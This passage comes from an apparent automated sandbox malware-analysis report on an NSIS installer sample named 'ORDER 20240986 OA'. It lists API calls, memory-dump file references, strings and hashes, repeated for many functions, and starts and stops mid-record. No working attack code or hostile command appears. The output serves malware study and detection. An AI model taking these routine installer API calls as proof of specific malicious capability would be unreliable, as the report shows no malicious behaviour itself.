                                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                  • String ID: !
                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                  • Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                                                                                  • Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
                                                                                                                                                  • Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                                                                                  • Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                                                                                  • wsprintfW.USER32 ref: 00404B65
                                                                                                                                                  • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                                  • Opcode ID: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                                                                                                  • Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
                                                                                                                                                  • Opcode Fuzzy Hash: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                                                                                                  • Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
                                                                                                                                                  APIs
                                                                                                                                                  • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,?,?,74DF3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C25
                                                                                                                                                  • CharNextW.USER32(00000000), ref: 00405C2A
                                                                                                                                                  • CharNextW.USER32(00000000), ref: 00405C42
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\nsx1318.tmp, xrefs: 00405C18
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharNext
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsx1318.tmp
                                                                                                                                                  • API String ID: 3213498283-2645957968
                                                                                                                                                  • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                                                                                  • Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
                                                                                                                                                  • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                                                                                  • Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
                                                                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
                                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B8E
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                  • API String ID: 2659869361-3081826266
                                                                                                                                                  • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                  • Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
                                                                                                                                                  • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                  • Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD
                                                                                                                                                  APIs
                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$Enum
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 464197530-0
                                                                                                                                                  • Opcode ID: 1341f91fd8d518b2ca140e0133bcf02bd0ea54a7f691716fe820626e10176459
                                                                                                                                                  • Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
                                                                                                                                                  • Opcode Fuzzy Hash: 1341f91fd8d518b2ca140e0133bcf02bd0ea54a7f691716fe820626e10176459
                                                                                                                                                  • Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
                                                                                                                                                  APIs
                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,00403059,?,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                                  • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                                                                                  • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
                                                                                                                                                  • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                                                                                  • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                                                                                    • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,?,?,74DF3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C25
                                                                                                                                                    • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                                                                                                    • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx1318.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,?,?,74DF3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405CCD
                                                                                                                                                  • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx1318.tmp,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,?,?,74DF3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00405CDD
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsx1318.tmp
                                                                                                                                                  • API String ID: 3248276644-2645957968
                                                                                                                                                  • Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                                                                                                  • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
                                                                                                                                                  • Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                                                                                                  • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
                                                                                                                                                  APIs
                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063D9,80000002), ref: 004061AB
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 004061B6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseQueryValue
                                                                                                                                                  • String ID: Call
                                                                                                                                                  • API String ID: 3356406503-1824292864
                                                                                                                                                  • Opcode ID: e86e6fd2e5cb5672620ff5ab575da48d8fe54f653cf1da9627cee5843be69ab4
                                                                                                                                                  • Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
                                                                                                                                                  • Opcode Fuzzy Hash: e86e6fd2e5cb5672620ff5ab575da48d8fe54f653cf1da9627cee5843be69ab4
                                                                                                                                                  • Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004058B6
                                                                                                                                                  Strings
                                                                                                                                                  • Error launching installer, xrefs: 00405893
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                                  • String ID: Error launching installer
                                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                                  • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
